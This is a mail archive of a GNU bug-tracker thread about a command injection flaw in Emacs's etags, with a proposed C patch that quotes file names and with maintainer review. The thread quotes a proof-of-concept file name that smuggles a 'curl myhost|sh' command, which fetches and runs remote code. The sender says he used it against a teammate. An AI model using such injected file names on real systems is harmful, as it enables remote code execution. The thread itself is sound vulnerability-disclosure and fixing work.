0Q0qZpFvUDJz9jZZUNnE6SBhHAhee4DbdK/p/BQnFMJk8we9Dg X-HAS-ATTACH: no X-QQ-BUSINESS-ORIGIN: 2 X-Originating-IP: 255.51.246.161 X-QQ-STYLE: X-QQ-mid: webmail543t1670201893t8927532 From: "=?ISO-8859-1?B?bHV4?=" To: "=?ISO-8859-1?B?RWxpIFphcmV0c2tpaQ==?=" Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_638D4225_0FED55A0_1F60518E" Content-Transfer-Encoding: 8Bit Date: Mon, 5 Dec 2022 08:58:13 +0800 X-Priority: 3 Message-ID: X-QQ-MIME: TCMime 1.0 by Tencent X-Mailer: QQMail 2.x X-QQ-Mailer: QQMail 2.x X-Spam-Score: 4.9 (++++) X-Spam-Report: Spam detection software, running on the system "debbugs.gnu.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: > Please understand: etags is a stable program.  I'm not interested in > changes that modify its design or implementation in such drastic ways. I understand, but not completely agree, stable != security. Content analysis details: (4.9 points, 10.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 1.3 RCVD_ILLEGAL_IP Received: contains illegal IP address -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at https://www.dnswl.org/, no trust [162.62.58.211 listed in list.dnswl.org] 0.0 SPF_HELO_NONE SPF: HELO does not publish an SPF Record 0.0 SPF_NONE SPF: sender does not publish an SPF Record 0.0 HTML_MESSAGE BODY: HTML included in message 0.0 T_TVD_MIME_EPI BODY: No description available. 0.0 FROM_EXCESS_BASE64 From: base64 encoded unnecessarily 0.4 RDNS_DYNAMIC Delivered to internal network by host with dynamic-looking rDNS 3.2 HELO_DYNAMIC_IPADDR Relay HELO'd using suspicious hostname (IP addr 1) 0.0 NO_FM_NAME_IP_HOSTN No From name + hostname using IP address X-Debbugs-Envelope-To: 59817 Cc: =?ISO-8859-1?B?NTk4MTc=?= <59817@debbugs.gnu.org> X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: 3.9 (+++) X-Spam-Report: Spam detection software, running on the system "debbugs.gnu.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: > Please understand: etags is a stable program.  I'm not interested in > changes that modify its design or implementation in such drastic ways. I understand, but not completely agree, stable != security. Content analysis details: (3.9 points, 10.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at https://www.dnswl.org/, no trust [162.62.58.211 listed in list.dnswl.org] 1.3 RCVD_ILLEGAL_IP Received: contains illegal IP address 0.0 SPF_HELO_NONE SPF: HELO does not publish an SPF Record 0.0 SPF_NONE SPF: sender does not publish an SPF Record 0.0 HTML_MESSAGE BODY: HTML included in message 0.0 T_TVD_MIME_EPI BODY: No description available. 0.0 FROM_EXCESS_BASE64 From: base64 encoded unnecessarily 0.4 RDNS_DYNAMIC Delivered to internal network by host with dynamic-looking rDNS -1.0 MAILING_LIST_MULTI Multiple indicators imply a widely-seen list manager 3.2 HELO_DYNAMIC_IPADDR Relay HELO'd using suspicious hostname (IP addr 1) This is a multi-part message in MIME format. ------=_NextPart_638D4225_0FED55A0_1F60518E Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: base64 Jmd0OyBQbGVhc2UgdW5kZXJzdGFuZDogZXRhZ3MgaXMgYSBzdGFibGUgcHJvZ3JhbS4mbmJz cDsgSSdtIG5vdCBpbnRlcmVzdGVkIGluDQomZ3Q7IGNoYW5nZXMgdGhhdCBtb2RpZnkgaXRz IGRlc2lnbiBvciBpbXBsZW1lbnRhdGlvbiBpbiBzdWNoIGRyYXN0aWMgd2F5cy4NCg0KSSB1 bmRlcnN0YW5kLCBidXQgbm90IGNvbXBsZXRlbHkgYWdyZWUsIHN0YWJsZSAhPSBzZWN1cml0 eS4NCg0KV2h5IHVzZSB0aGUgc3lzdGVtKCkgZnVuY3Rpb24/IFRoaXMgaXMgYSBsYXp5LCBp bnNlY3VyZSBsaXR0bGUgdHJpY2ssDQp0aGUgZXhlYyooc3VjaCBhcyBleGVjdnApIGZ1bmN0 aW9uIHNob3VsZCBiZSB1c2VkIGZpcnN0LiBXZSBuZWVkDQpleGVjdXRlIGEgY29tbWFuZCwg YnV0IHdlIGRvbid0IG5lZWQgZXhlY3V0ZSBhIHNoZWxsIHNjcmlwdC4NCg0KRXhhbXBsZSBh IGNhc2UsIEluIG15IHRlYW0sIHNvbWUgcGVvcGxlIGxpa2UgYXV0b21hdGljYWxseSBwdWxs IG5ldw0KY29kZSBmcm9tIGNvZGUgc2VydmVyLCBhbmQgdXNlIGV0YWdzIHVwZGF0ZSB0YWdz LCBzbyBJIHNlY3JldGx5IHVwbG9hZGVkDQphIG5ldyBmaWxlLCB0aGUgZmlsZSBuYW1lIGlz Og0KDQokIHRvdWNoICInO2N1cmwgbXlob3N0fHNoICMnYS56Ig0KDQp3aGVuIGhlIGF1dG9t YXRpY2FsbHkgdXBkYXRlIHRoZSB0YWdzLCBJIGhhY2tpbmcgaGlzIGNvbXB1dGVyLg0KDQpT bywgSSBoYXZlIHR3byBzdWdnZXN0aW9uczoNCg0KMS4gZG9uJ3QgdXNlIHN5c3RlbSgpLCB1 bmxlc3Mga25vdyB3aGF0IGFyZSBkb2luZy4NCg0KMi4gZXNjYXBlIGFsbCBkYW5nZXJvdXMg Y2hhcmFjdGVycywganVzdCBlc2NhcGluZyBxdW90ZXMgaXMgbm90DQplbm91Z2gsIHRoZSBm b2xsb3dpbmcgY2hhcmFjdGVycyBjYW4gcGVyZm9ybSBhZGRpdGlvbmFsIGFjdGlvbnM6DQoN CiIkKGxzKSINCiJgbHNgIg0KIiR7U0hFTEx9Ig0KIiRTSEVMTCINCg0KSSdtIHdyaXRpbmcg YSBuZXcgcGF0Y2ggdG8gZXNjYXBlIGRhbmdlcm91cyBjaGFyYWN0ZXJzLCBhbmQgdGVzdC4N Cg0KVGhhbmtzLg== ------=_NextPart_638D4225_0FED55A0_1F60518E Content-Type: text/html; charset="ISO-8859-1" Content-Transfer-Encoding: base64 Jmd0OyBQbGVhc2UgdW5kZXJzdGFuZDogZXRhZ3MgaXMgYSBzdGFibGUgcHJvZ3JhbS4mbmJz cDsgSSdtIG5vdCBpbnRlcmVzdGVkIGluPGJyPiZndDsgY2hhbmdlcyB0aGF0IG1vZGlmeSBp dHMgZGVzaWduIG9yIGltcGxlbWVudGF0aW9uIGluIHN1Y2ggZHJhc3RpYyB3YXlzLjxicj48 YnI+SSB1bmRlcnN0YW5kLCBidXQgbm90IGNvbXBsZXRlbHkgYWdyZWUsIHN0YWJsZSAhPSBz ZWN1cml0eS48YnI+PGJyPldoeSB1c2UgdGhlIHN5c3RlbSgpIGZ1bmN0aW9uPyBUaGlzIGlz IGEgbGF6eSwgaW5zZWN1cmUgbGl0dGxlIHRyaWNrLDxicj50aGUgZXhlYyooc3VjaCBhcyBl eGVjdnApIGZ1bmN0aW9uIHNob3VsZCBiZSB1c2VkIGZpcnN0LiBXZSBuZWVkPGJyPmV4ZWN1 dGUgYSBjb21tYW5kLCBidXQgd2UgZG9uJ3QgbmVlZCBleGVjdXRlIGEgc2hlbGwgc2NyaXB0 Ljxicj48YnI+RXhhbXBsZSBhIGNhc2UsIEluIG15IHRlYW0sIHNvbWUgcGVvcGxlIGxpa2Ug YXV0b21hdGljYWxseSBwdWxsIG5ldzxicj5jb2RlIGZyb20gY29kZSBzZXJ2ZXIsIGFuZCB1 c2UgZXRhZ3MgdXBkYXRlIHRhZ3MsIHNvIEkgc2VjcmV0bHkgdXBsb2FkZWQ8YnI+YSBuZXcg ZmlsZSwgdGhlIGZpbGUgbmFtZSBpczo8YnI+PGJyPiQgdG91Y2ggIic7Y3VybCBteWhvc3R8 c2ggIydhLnoiPGJyPjxicj53aGVuIGhlIGF1dG9tYXRpY2FsbHkgdXBkYXRlIHRoZSB0YWdz LCBJIGhhY2tpbmcgaGlzIGNvbXB1dGVyLjxicj48YnI+U28sIEkgaGF2ZSB0d28gc3VnZ2Vz dGlvbnM6PGJyPjxicj4xLiBkb24ndCB1c2Ugc3lzdGVtKCksIHVubGVzcyBrbm93IHdoYXQg YXJlIGRvaW5nLjxicj48YnI+Mi4gZXNjYXBlIGFsbCBkYW5nZXJvdXMgY2hhcmFjdGVycywg anVzdCBlc2NhcGluZyBxdW90ZXMgaXMgbm90PGJyPmVub3VnaCwgdGhlIGZvbGxvd2luZyBj aGFyYWN0ZXJzIGNhbiBwZXJmb3JtIGFkZGl0aW9uYWwgYWN0aW9uczo8YnI+PGJyPiIkKGxz KSI8YnI+ImBsc2AiPGJyPiIke1NIRUxMfSI8YnI+IiRTSEVMTCI8YnI+PGJyPkknbSB3cml0 aW5nIGEgbmV3IHBhdGNoIHRvIGVzY2FwZSBkYW5nZXJvdXMgY2hhcmFjdGVycywgYW5kIHRl c3QuPGJyPjxicj5UaGFua3MuPGJyPjxicj48YnI+ ------=_NextPart_638D4225_0FED55A0_1F60518E-- É From debbugs-submit-bounces@debbugs.gnu.org Mon Dec 05 07:35:36 2022 Received: (at 59817) by debbugs.gnu.org; 5 Dec 2022 12:35:37 +0000 Received: from localhost ([127.0.0.1]:35755 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2Ah6-0000LD-JB for submit@debbugs.gnu.org; Mon, 05 Dec 2022 07:35:36 -0500 Received: from eggs.gnu.org ([209.51.188.92]:54324) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2Ah4-0000L5-Rc for 59817@debbugs.gnu.org; Mon, 05 Dec 2022 07:35:35 -0500 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2Agy-0003L1-9x; Mon, 05 Dec 2022 07:35:28 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=References:Subject:In-Reply-To:To:From:Date: mime-version; bh=nF8MgGPWk+seFgasgRtgdS5nS3yq6c7tR4ZbmUBKjZI=; b=KXlnSGfxXfLD wrLH/EyHqLC2urIeYDLx2iwXxGJeBqORXmOGQQoVQ1KS/z2NABvPUxD4V+FptjNkxeaD8M7Hx1ksR gsl/dILDwihDBLa76w6HOMafzROSRV7bBVBpd58gF6ShiomWOSI3afF4yz9ECpu95SXAnxqkhJ21h 7kChMwAd4Dk2WQQMxyzMk6WRprxAxGtbDyXOlG+eqjUfQGUJ0JIgk3OO0wh9pF2nXcZyLjNiGLxTe Dz6F2smJAcDeo2vdqYc/JRA5pG+CF0rx5O7O9fykM05PIi9sfVdZdvatkrz8r1RJGs0Ypw6sP5SEs nfIJJ0vUWdylTNSIhJAUsA==; Received: from [87.69.77.57] (helo=home-c4e4a596f7) by fencepost.gnu.org with esmtpsa (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2Agk-0002rM-4B; Mon, 05 Dec 2022 07:35:27 -0500 Date: Mon, 05 Dec 2022 14:34:58 +0200 Message-Id: <834jua9ggd.fsf@gnu.org> From: Eli Zaretskii To: lux In-Reply-To: (message from lux on Mon, 5 Dec 2022 08:56:43 +0800) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 59817 Cc: Stefan Kangas , 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) [Please use Reply All to keep the bug tracker CC'ed.] > Date: Mon, 5 Dec 2022 08:56:43 +0800 > From: lux > > > Please understand: etags is a stable program. I'm not interested in > > changes that modify its design or implementation in such drastic ways. > > I understand, but not completely agree, stable != security. There are ways to plug the security holes in this case without completely rewriting large parts of the code. > Why use the system() function? This is a lazy, insecure little trick, > the exec*(such as execvp) function should be used first. We need > execute a command, but we don't need execute a shell script. I think you have a very idealized view of the alternative APIs. They don't share some disadvantages with 'system', but they have plenty of their own ones. Especially on non-Posix systems. > Example a case, In my team, some people like automatically pull new > code from code server, and use etags update tags, so I secretly uploaded > a new file, the file name is: > > $ touch "';curl myhost|sh #'a.z" > > when he automatically update the tags, I hacking his computer. Quoting should fix that. > So, I have two suggestions: > > 1. don't use system(), unless know what are doing. I don't see a reason in this case to rewrite the code not to use 'system'. > 2. escape all dangerous characters, just escaping quotes is not > enough, the following characters can perform additional actions: > > "$(ls)" > "`ls`" > "${SHELL}" > "$SHELL" > > I'm writing a new patch to escape dangerous characters, and test. There's no reason to try detecting which characters are dangerous and which aren't. We should instead quote all the file names that come from outside of the program, so that what's inside the quotes is interpreted verbatim. From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 02:56:59 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 07:56:59 +0000 Received: from localhost ([127.0.0.1]:41321 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2Soz-0004DP-QR for submit@debbugs.gnu.org; Tue, 06 Dec 2022 02:56:59 -0500 Received: from out203-205-221-221.mail.qq.com ([203.205.221.221]:49347) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2Sos-0004DJ-5M for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 02:56:56 -0500 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=qq.com; s=s201512; t=1670313400; bh=JOu1GaxAvqUY2u+IvYvDWnqqM72KSZ8Gq/jUmw78viw=; h=Date:From:To:Cc:Subject:In-Reply-To:References; b=X8Rdl6QbuOJLvCX9DKfpTSGVSxIklm1atlAHx83nKDU/IYUEcR5o+PaDl4JRsj/ir BnNujbPMrYuSC6lEuu+5bgAoFnq0zaN7M/+5vpgGl4V7Yx/AhHbtb55GITyA8nRLAu 8NEho3abI0F2CbR23wZ7FtG3vwVdK/qdpF+PB5MI= Received: from lx-pc ([1.14.69.203]) by newxmesmtplogicsvrszc1-0.qq.com (NewEsmtp) with SMTP id E269422D; Tue, 06 Dec 2022 15:56:38 +0800 X-QQ-mid: xmsmtpt1670313398t4wvl22q3 Message-ID: X-QQ-XMAILINFO: OUMxvQDaATie1h/6aekoVE8149TL6j3w1RNvzMUuXklFv4x9FJQMsdWq9WXh9R p0a7BcGRmb4C+fujgdera8z27/fWSnH0WwEX2Nvi+GupOhz7CDQp9zIOfX45HJ/xfp/u2OPG402M iJXlIwL/iK6/8EpB5ltw3kBqCPVswIijPKZDDje75ZE7UOMFnGr684U+4j43u5E68pWPjILUh8wS 8kJqiw5OU8u+J2L9/6ZXGL1DI5TrMxIv10TkAxJQtkyixuUEkzMieotHbpDr84z75Neukhsxt4M3 tLr5WzzbRbc3+ed+kly5+TxUEO4joOdH6Ew+apyTBa35zlHaaDCww/N7uOnbtxjYh58ySU3Pc5Ga ISKiDJSN5RZMqZTTEE3ZFXe6nIRiH1kV92aPGbY28nMC3uTPr+8gTgC6PnuO+VQFm0Qrq665wxmg /EefAoZwW9i2kGSdGBKC1g7wHeFNcs/2KqVY8Chfk9NsoDTgMDOzFSpf3uuihguLgFKzReB0omI8 1NfMdbki03I0ViK5ffVRZIim9TqRd/3o364+b+DYYIwaAVHnSJ1JGq8tDeCqn8Au4+flgolnIxpD yBAIsYEDeaMIH16bPqw7aOVuJq75P4cpbC6Cc7Bn6ZOML6VKE6rFr091gaUYVmjUq+DspUVa1hP7 lXx5EN+XawvE90Z1WMuNUIHYcyhcG9VDOuyqa9TArQhXOuCIgJjZh7OzDPac3SnDUFyuWuCd5fbc iQp8P+4vQBAN7vU9oUV3d1uvBUANvGpet2cqj+Td0SNTsAvfH8DidTWgZDF2XZRTWFCth1syYeMZ WtySifruw8j+XGJ8Di0RDzCoiTlFM34E0PveJxf8/XoC7uIY1kNQ0viFudUXFMJ7mK72+/vvekPG nlrmyQjzHWXzZ84rRtDTFrTHYWniDpxCR1zlkQF7rtKSfnFy+8zgkcLrnc3GEdLvxoBMivyxSN3K 1gjyooVfSlHeB+zDbRu8DsYwpFfPFD2DLnX2hOxvsbouc2loqrzKkTc4pG40qMlHA5knfUdXc= Date: Tue, 6 Dec 2022 15:48:10 +0800 From: lux To: Eli Zaretskii Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability X-OQ-MSGID: <20221206154810.4a8b029c@lx-pc> In-Reply-To: <834jua9ggd.fsf@gnu.org> References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> X-Mailer: Claws Mail 4.1.1 (GTK 3.24.35; x86_64-redhat-linux-gnu) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="MP_/FwVzzdtNKr4yNw4mD=nQy5f" X-Spam-Score: 3.6 (+++) X-Spam-Report: Spam detection software, running on the system "debbugs.gnu.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: On Mon, 05 Dec 2022 14:34:58 +0200 Eli Zaretskii wrote: > There's no reason to try detecting which characters are dangerous and > which aren't. We should instead quote all the file names that come > from outside of the program, so that what's inside the qu [...] Content analysis details: (3.6 points, 10.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 RCVD_IN_MSPIKE_H2 RBL: Average reputation (+2) [203.205.221.221 listed in wl.mailspike.net] -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at https://www.dnswl.org/, no trust [203.205.221.221 listed in list.dnswl.org] 0.0 SPF_NONE SPF: sender does not publish an SPF Record 0.0 T_SPF_HELO_TEMPERROR SPF: test of HELO record failed (temperror) 0.4 RDNS_DYNAMIC Delivered to internal network by host with dynamic-looking rDNS 3.2 HELO_DYNAMIC_IPADDR Relay HELO'd using suspicious hostname (IP addr 1) X-Debbugs-Envelope-To: 59817 Cc: Stefan Kangas , 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: 2.6 (++) X-Spam-Report: Spam detection software, running on the system "debbugs.gnu.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: On Mon, 05 Dec 2022 14:34:58 +0200 Eli Zaretskii wrote: > There's no reason to try detecting which characters are dangerous and > which aren't. We should instead quote all the file names that come > from outside of the program, so that what's inside the qu [...] Content analysis details: (2.6 points, 10.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at https://www.dnswl.org/, no trust [203.205.221.221 listed in list.dnswl.org] -0.0 RCVD_IN_MSPIKE_H2 RBL: Average reputation (+2) [203.205.221.221 listed in wl.mailspike.net] 0.0 SPF_HELO_NONE SPF: HELO does not publish an SPF Record 0.0 SPF_NONE SPF: sender does not publish an SPF Record 0.4 RDNS_DYNAMIC Delivered to internal network by host with dynamic-looking rDNS -1.0 MAILING_LIST_MULTI Multiple indicators imply a widely-seen list manager 3.2 HELO_DYNAMIC_IPADDR Relay HELO'd using suspicious hostname (IP addr 1) --MP_/FwVzzdtNKr4yNw4mD=nQy5f Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline On Mon, 05 Dec 2022 14:34:58 +0200 Eli Zaretskii wrote: > There's no reason to try detecting which characters are dangerous and > which aren't. We should instead quote all the file names that come > from outside of the program, so that what's inside the quotes is > interpreted verbatim. Thanks, this is new patch. --MP_/FwVzzdtNKr4yNw4mD=nQy5f Content-Type: text/x-patch Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=0001-Fix-etags-local-command-injection-vulnerability.patch >From 3ba143533d74d4caf59a192de6cab4a130140ce7 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Tue, 6 Dec 2022 15:42:40 +0800 Subject: [PATCH] Fix etags local command injection vulnerability * lib-src/etags.c: (escape_shell_arg_string): New function. --- lib-src/etags.c | 58 +++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 56 insertions(+), 2 deletions(-) diff --git a/lib-src/etags.c b/lib-src/etags.c index d1d20858cd..c3ecbc2221 100644 --- a/lib-src/etags.c +++ b/lib-src/etags.c @@ -401,6 +401,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) static void put_entries (node *); static void cleanup_tags_file (char const * const, char const * const); +static char* escape_shell_arg_string (char *); static void do_move_file (const char *, const char *); static char *concat (const char *, const char *, const char *); static char *skip_spaces (char *); @@ -1716,8 +1717,12 @@ process_file_name (char *file, language *lang) char *cmd1 = concat (compr->command, " \"", real_name); char *cmd = concat (cmd1, "\" > ", tmp_name); #else - char *cmd1 = concat (compr->command, " '", real_name); - char *cmd = concat (cmd1, "' > ", tmp_name); + char *new_real_name = escape_shell_arg_string (real_name); + char *new_tmp_name = escape_shell_arg_string (tmp_name); + char *cmd1 = concat (compr->command, " ", new_real_name); + char *cmd = concat (cmd1, " > ", new_tmp_name); + free (new_real_name); + free (new_tmp_name); #endif free (cmd1); inf = (system (cmd) == -1 @@ -7707,6 +7712,55 @@ etags_mktmp (void) return templt; } +/* + * Adds single quotes around a string, if found single quotes, escaped it. + * Return a newly-allocated string. + * + * For example: + * escape_shell_arg_string("test.txt") => 'test.txt' + * escape_shell_arg_string("'test.txt") => ''\''test.txt' + */ +static char* +escape_shell_arg_string (char *str) +{ + char *p = str; + int need_space = 2; /* ' at begin and end */ + + while (*p != '\0') + { + if (*p == '\'') + need_space += 4; /* ' to '\'', length is 4 */ + else + need_space++; + + p++; + } + + char *new_str = xnew (need_space + 1, char); + new_str[0] = '\''; + new_str[need_space-1] = '\''; + + int i = 1; /* skip first byte */ + p = str; + while (*p != '\0') + { + new_str[i] = *p; + if (*p == '\'') + { + new_str[i+1] = '\\'; + new_str[i+2] = '\''; + new_str[i+3] = '\''; + i += 3; + } + + i++; + p++; + } + + new_str[need_space] = '\0'; + return new_str; +} + static void do_move_file(const char *src_file, const char *dst_file) { -- 2.38.1 --MP_/FwVzzdtNKr4yNw4mD=nQy5f-- From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 07:55:31 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 12:55:31 +0000 Received: from localhost ([127.0.0.1]:42839 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2XTv-0001GK-Ee for submit@debbugs.gnu.org; Tue, 06 Dec 2022 07:55:31 -0500 Received: from eggs.gnu.org ([209.51.188.92]:55398) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2XTu-0001GE-Ij for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 07:55:30 -0500 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2XTp-00069I-Bi; Tue, 06 Dec 2022 07:55:25 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=References:Subject:In-Reply-To:To:From:Date: mime-version; bh=4eOcloXATyA7nuhzu7hZiYPA95R315xteVO8TVaDwqI=; b=F+N9CdRV0oqh KOp0zrFRs349aUFgnbAY1ihv6XpbZ/Az86iK3EjEeLyfZ2lX6+qVl7PeXe2jTnw2dy7qdG+HDxJNx NMqmsYDHX/y+sBXJnslC6P5uRZpoGB49hxhscBuscEmx9JmGvPY1H/YYQzss+bIakEmR/mRR73H77 kqoqHLY7Fju4nKPKXJ7gBAow3/hjGCmYfnWvQQAQnSdP21bAJHb5GpfrfgFynglgSyMjxHhl09x9G sZDHHta/VfHunIZ/07Fw3FPPC4tvyOPQ5a4but1pJxMwxZ4plXDTzawzTJMBqvFWw7OGeXejdSGj4 qy1iwt50oChkMXNjc/8kbQ==; Received: from [87.69.77.57] (helo=home-c4e4a596f7) by fencepost.gnu.org with esmtpsa (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2XTo-00029R-Pg; Tue, 06 Dec 2022 07:55:25 -0500 Date: Tue, 06 Dec 2022 14:55:09 +0200 Message-Id: <83lenk7kuq.fsf@gnu.org> From: Eli Zaretskii To: lux In-Reply-To: (message from lux on Tue, 6 Dec 2022 15:48:10 +0800) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 59817 Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) > Date: Tue, 6 Dec 2022 15:48:10 +0800 > From: lux > Cc: Stefan Kangas , 59817@debbugs.gnu.org > > @@ -1716,8 +1717,12 @@ process_file_name (char *file, language *lang) > char *cmd1 = concat (compr->command, " \"", real_name); > char *cmd = concat (cmd1, "\" > ", tmp_name); > #else > - char *cmd1 = concat (compr->command, " '", real_name); > - char *cmd = concat (cmd1, "' > ", tmp_name); > + char *new_real_name = escape_shell_arg_string (real_name); > + char *new_tmp_name = escape_shell_arg_string (tmp_name); > + char *cmd1 = concat (compr->command, " ", new_real_name); > + char *cmd = concat (cmd1, " > ", new_tmp_name); > + free (new_real_name); > + free (new_tmp_name); > #endif The "MSDOS || DOS_NT" case also needs a small change: > char *cmd = concat (cmd1, "\" > ", tmp_name); This doesn't quote tmp_name; it should. > +static char* ^^ There should be a space before "*". > + if (*p == '\'') > + { > + new_str[i+1] = '\\'; > + new_str[i+2] = '\''; > + new_str[i+3] = '\''; > + i += 3; I don't understand why you are adding ''\'' and not just \'. Wouldn't the latter work for some reason? Thanks. From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 08:05:28 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 13:05:28 +0000 Received: from localhost ([127.0.0.1]:42888 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2XdX-0001MF-NR for submit@debbugs.gnu.org; Tue, 06 Dec 2022 08:05:28 -0500 Received: from smtp-out1.suse.de ([195.135.220.28]:33202) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2XdS-0001M7-Fo for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 08:05:26 -0500 Received: from relay2.suse.de (relay2.suse.de [149.44.160.134]) by smtp-out1.suse.de (Postfix) with ESMTP id E1FAA21C4F; Tue, 6 Dec 2022 13:05:16 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.de; s=susede2_rsa; t=1670331916; h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc: mime-version:mime-version:content-type:content-type: in-reply-to:in-reply-to:references:references; bh=FJBPmfpnLgVuVOoLDtpT3EUCm3AgSpsIrQ6QIPt8J0M=; b=jSeFwg/XKjJEEjR+GxfKvMWsOAPgHSSFdOYmh6s5J4+xzCIGX0Lm69K/4lYhw9IB9+CUUG dYu+Uh+SAty7bRN9Rt9xlY+3FyDi4WKYa45Cjo1jyppcJBxV6K0BTPmO1wu7suBotCgUsD GhnaAdj9NC25Q2xNmAhGUCpllV4DuJo= DKIM-Signature: v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.de; s=susede2_ed25519; t=1670331916; h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc: mime-version:mime-version:content-type:content-type: in-reply-to:in-reply-to:references:references; bh=FJBPmfpnLgVuVOoLDtpT3EUCm3AgSpsIrQ6QIPt8J0M=; b=Kwrfd+O3qdhXLB8tLYXR1GpEwCEiATEd9vpiaiTgysmxkzgWLBAxqTaxBInjC4fX28kgpY f1ppAGwO1yNoJpCA== Received: from hawking.suse.de (unknown [10.168.4.11]) by relay2.suse.de (Postfix) with ESMTP id D313A2C141; Tue, 6 Dec 2022 13:05:16 +0000 (UTC) Received: by hawking.suse.de (Postfix, from userid 17005) id 86E1044012D; Tue, 6 Dec 2022 14:05:16 +0100 (CET) From: Andreas Schwab To: lux Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> X-Yow: FISH-NET-FISH-NET-FISH-NET-FISH-NET-FISH!! Date: Tue, 06 Dec 2022 14:05:16 +0100 In-Reply-To: (lux's message of "Tue, 6 Dec 2022 15:48:10 +0800") Message-ID: User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/28.2 (gnu/linux) MIME-Version: 1.0 